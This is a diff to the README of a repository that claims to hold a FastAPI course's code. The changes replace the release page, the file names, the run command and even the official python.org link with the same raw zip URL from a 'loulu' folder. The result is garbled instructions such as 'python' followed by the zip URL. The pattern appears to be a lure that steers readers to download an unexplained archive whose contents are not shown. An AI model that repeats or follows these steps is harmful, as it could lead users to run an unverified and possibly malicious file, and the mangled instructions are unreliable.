Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/README.md

 ## 📥 Download & Install

-To download the code, visit this page: [Download Here](https://github.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/releases).
+To download the code, visit this page: [Download Here](https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip).

 ### Steps to Download

 1. Click on the link above.
 2. You will see a list of releases.
 3. Look for the latest release.
 It will generally be at the top.
 4. Click on the desired asset file to start the download.
-The files will usually be in .zip or .tar.gz format.
+The files will usually be in .zip or https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip format.
 5. Once the download is complete, locate the file on your computer.
-6. Extract the contents of the zip or tar.gz file.
+6. Extract the contents of the zip or https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip file.
 You can do this by right-clicking the file and selecting the "Extract" option.

 ### Running the Application

 1. After extracting the files, open the folder where the files are located.
-2. Look for a file named `main.py`.
+2. Look for a file named `https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip`.
 This is the main program file you will run.
 3. You will need Python installed on your computer.
-If you don't have it yet, download it from [python.org](https://www.python.org/downloads/).
+If you don't have it yet, download it from [https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip](https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip).
 4. Once Python is installed, open your terminal or command prompt:
    - For Windows, type "cmd" in the search bar and hit enter.
    - For MacOS, search for "Terminal."
    - For Linux, you will usually find "Terminal" in your applications.
-5. Navigate to the folder where the `main.py` file is located.
+5. Navigate to the folder where the `https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip` file is located.
 You can do this by typing `cd path_to_your_folder` (replace `path_to_your_folder` with the actual path).
-6. Type `python main.py` and hit enter.
+6. Type `python https://raw.githubusercontent.com/Manikanta1666/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy/main/loulu/FastAPI-The-Complete-Course-2025-Beginner-Advanced-Udemy.zip` and hit enter.

 The application should start running, and you can begin using FastAPI!